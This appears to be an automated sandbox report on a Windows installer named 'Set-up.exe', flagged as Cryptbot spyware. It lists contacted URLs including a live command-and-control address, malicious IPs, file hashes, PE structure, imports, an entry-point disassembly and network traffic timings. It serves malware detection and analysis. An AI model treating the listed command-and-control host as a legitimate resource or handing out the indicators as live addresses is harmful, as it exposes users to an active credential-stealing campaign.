https://curl.se/docs/hsts.html	Set-up.exe	false		high
http://html4/loose.dtd	Set-up.exe	false		high
https://curl.se/docs/alt-svc.html#	Set-up.exe	false		high
https://httpbin.org/ipbefore	Set-up.exe	false		high
https://curl.se/docs/http-cookies.html	Set-up.exe	false		high
https://curl.se/docs/hsts.html#	Set-up.exe	false		high
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJm	Set-up.exe, 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4	Set-up.exe, 00000000.00000002.2253280536.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251976781.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252171171.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252153907.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251997102.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/http-cookies.html#	Set-up.exe	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe	false		high
http://.css	Set-up.exe	false		high
http://.jpg	Set-up.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.147.147.173	home.thirttj13vs.top	United States		2686	ATGS-MMD-ASUS	false
50.19.58.113	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585344
Start date and time:	2025-01-07 14:37:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal88.troj.spyw.evad.winEXE@1/0@9/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 77% Number of executed functions: 44 Number of non-executed functions: 144
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.147.147.173	Set-up.exe	Get hash	malicious	Cryptbot	Browse	home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767
	Set-up.exe	Get hash	malicious	Cryptbot	Browse	home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	random(5).exe	Get hash	malicious	Cryptbot	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	Set-up.exe	Get hash	malicious	Unknown	Browse	home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
	Set-up.exe	Get hash	malicious	Unknown	Browse	home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
50.19.58.113	Set-up.exe	Get hash	malicious	Cryptbot	Browse
50.19.58.113	Set-up.exe	Get hash	malicious	Cryptbot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	Set-up.exe	Get hash	malicious	Cryptbot	Browse	50.19.58.113
	Set-up.exe	Get hash	malicious	Cryptbot	Browse	50.19.58.113
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	34.197.122.172
	random(3).exe	Get hash	malicious	Cryptbot	Browse	34.200.57.114
	random(5).exe	Get hash	malicious	Cryptbot	Browse	34.200.57.114
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Prs9eAnu2k.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
home.thirttj13vs.top	Set-up.exe	Get hash	malicious	Cryptbot	Browse	34.147.147.173
home.thirttj13vs.top	Set-up.exe	Get hash	malicious	Cryptbot	Browse	34.147.147.173

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	miori.mpsl.elf	Get hash	malicious	Unknown	Browse	34.237.171.139
	miori.m68k.elf	Get hash	malicious	Unknown	Browse	18.234.211.28
	https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526	Get hash	malicious	Unknown	Browse	3.5.69.65
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	3.230.91.101
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	3.5.0.85
	http://zpr.io/Kv3PL3bahS66#/yl4Wu36827Bu431QZ961hL12343hL3105bG14HH36065Ve26730Ek67523jA69203Zh08983yN1415487657=	Get hash	malicious	Unknown	Browse	34.239.90.156
	https://d3sdeiz39xdvhy.cloudfront.net	Get hash	malicious	Unknown	Browse	3.5.28.69
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	3.211.160.164
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	52.206.40.253
	miori.x86.elf	Get hash	malicious	Unknown	Browse	3.93.170.239
ATGS-MMD-ASUS	miori.arm5.elf	Get hash	malicious	Unknown	Browse	56.181.99.78
	miori.spc.elf	Get hash	malicious	Unknown	Browse	34.161.163.146
	miori.mpsl.elf	Get hash	malicious	Unknown	Browse	32.159.254.120
	miori.mips.elf	Get hash	malicious	Unknown	Browse	56.193.95.60
	miori.m68k.elf	Get hash	malicious	Unknown	Browse	33.147.120.229
	miori.arm.elf	Get hash	malicious	Unknown	Browse	57.152.43.223
	miori.sh4.elf	Get hash	malicious	Unknown	Browse	56.26.234.229
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	33.147.219.140
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	34.54.88.138
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	34.1.227.231

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.2389850647833285
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	7'343'240 bytes
MD5:	e52da29ca9214e322ba939105a9d6bb8
SHA1:	d68b8830eb9422ec86519d79489b74b961b8ede9
SHA256:	cdfd0e6a74e3e02b6cd8bdb70f68502354c876bcce3c897fa110ba93a3ce157a
SHA512:	485673203bf397ce90ee839f0a5b299ca8b36650679ddad10898dbea9727ecac09fad837fac900f343e70e52057839d317ca182898f3bc728aae1efb4484101f
SSDEEP:	98304:M20fKv7YQHm2cEcbKRBeMVf+I6SK3yz8Q:ayUQG2sKHe/SwG8Q
TLSH:	68762A65EE8785F5D68305725056B73F6E30AF009835CEB6CE90FB34D672A11E98E328
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{g...............(..M...p..2............M...@...........................p.....2\p...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x677BC18D [Mon Jan 6 11:42:05 2025 UTC]
TLS Callbacks:	0x7890e0, 0x789090
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	51b39aff649af7abc30a06f2362db069

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	26/08/2024 18:01:06 21/08/2025 18:01:06
Subject Chain	CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
Version:	3
Thumbprint MD5:	4F692AD7D5E9F7541C05264FF2520114
Thumbprint SHA-1:	21083D0EDD4084816CAEA285AC1B723E6FCC743D
Thumbprint SHA-256:	32F5B9B1551F53C237D964D7810B2EA70F7101DACC20AF78D0632A1B3BBED61B
Serial:	33009F7B734DB0480411EB0BBA0000009F7B73

Entrypoint Preview

Instruction
mov dword ptr [00ACD658h], 00000001h
jmp 00007F4361087796h
nop
mov dword ptr [00ACD658h], 00000000h
jmp 00007F4361087786h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F436140EFF6h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00973000h
call dword ptr [00ACF9A8h]
sub esp, 04h
test eax, eax
je 00007F4361087B55h
mov ebx, eax
mov dword ptr [esp], 00973000h
call dword ptr [00ACFA1Ch]
mov edi, dword ptr [00ACF9BCh]
sub esp, 04h
mov dword ptr [00ACB028h], eax
mov dword ptr [esp+04h], 00973013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00973029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008DF004h], eax
test esi, esi
je 00007F4361087AF3h
mov dword ptr [esp+04h], 00ACB02Ch
mov dword ptr [esp], 00AC6104h
call esi
mov dword ptr [esp], 00401580h
call 00007F4361087A43h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6cf000	0x2dac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x700600	0x688	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d4000	0x34cac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x6bb320	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6cf814	0x620	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4dd7dc	0x4dd800	78b38f7fc4512396670ca8047ec26268	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4df000	0x93844	0x93a00	591873babcb047cd7a92aba5b1e02b68	False	0.03943460256138866	dBase III DBT, version number 0, next free block index 10	0.5495822228695116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x573000	0x152158	0x152200	15c30fe6924a9e38af9d630b0d79e379	False	0.4208229840573013	data	6.276992533378594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x6c6000	0x4d64	0x4e00	9b5abfcb69713e2809be5fd0aff2f900	False	0.3196614583333333	data	4.912121609306582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x6cb000	0x3180	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6cf000	0x2dac	0x2e00	26a5aafaa2e4e68426394b48fecda243	False	0.36922554347826086	data	5.484899309984402	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x6d2000	0x30	0x200	fe2a65d4187b984679c52ae93485940e	False	0.0625	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x6d3000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x6d4000	0x34cac	0x34e00	be566086ba0e62562421bb437f75b698	False	0.4982638888888889	data	6.658158135041687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll	BCryptGenRandom
CRYPT32.dll	CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll	GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL	ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll	AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll	__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll	atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	setlocale
api-ms-win-crt-math-l1-1-0.dll	_fdopen
api-ms-win-crt-private-l1-1-0.dll	memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll	_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll	_byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll	CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll	WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 14:38:00.986845016 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:00.986862898 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:00.986918926 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:00.989222050 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:00.989233971 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.671528101 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.672029972 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:01.672055960 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.673432112 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.673510075 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:01.674912930 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:01.674978971 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.683984041 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:01.683990955 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.726028919 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:01.791295052 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.791914940 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:01.792026997 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:01.792902946 CET	49704	443	192.168.2.5	50.19.58.113
Jan 7, 2025 14:38:01.792926073 CET	443	49704	50.19.58.113	192.168.2.5
Jan 7, 2025 14:38:16.073313951 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.078063965 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.078217030 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.080607891 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.086071968 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086098909 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086110115 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086134911 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086183071 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086190939 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086218119 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086291075 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.086354017 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.086652040 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086662054 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086672068 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.086741924 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.091535091 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.091543913 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.091607094 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.091615915 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.091630936 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.091644049 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.091653109 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.091742992 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.135107994 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.135320902 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.187087059 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.187180042 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.235076904 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.235168934 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.283123016 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.283278942 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.331156015 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.331276894 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.383065939 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.383116007 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.435071945 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.435126066 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.483073950 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.483150959 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.530011892 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.530126095 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.536318064 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536328077 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536377907 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.536448002 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536457062 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536464930 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536473036 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536575079 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536583900 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536592007 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536600113 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536632061 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.536673069 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.536709070 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536717892 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536725998 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536732912 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536807060 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.536859035 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536866903 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536875010 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536884069 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.536930084 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541142941 CET	80	49706	34.147.147.173	192.168.2.5
Jan 7, 2025 14:38:16.541191101 CET	49706	80	192.168.2.5	34.147.147.173
Jan 7, 2025 14:38:16.541196108 CET	80	49706	34.147.147.173	192.168.2.5
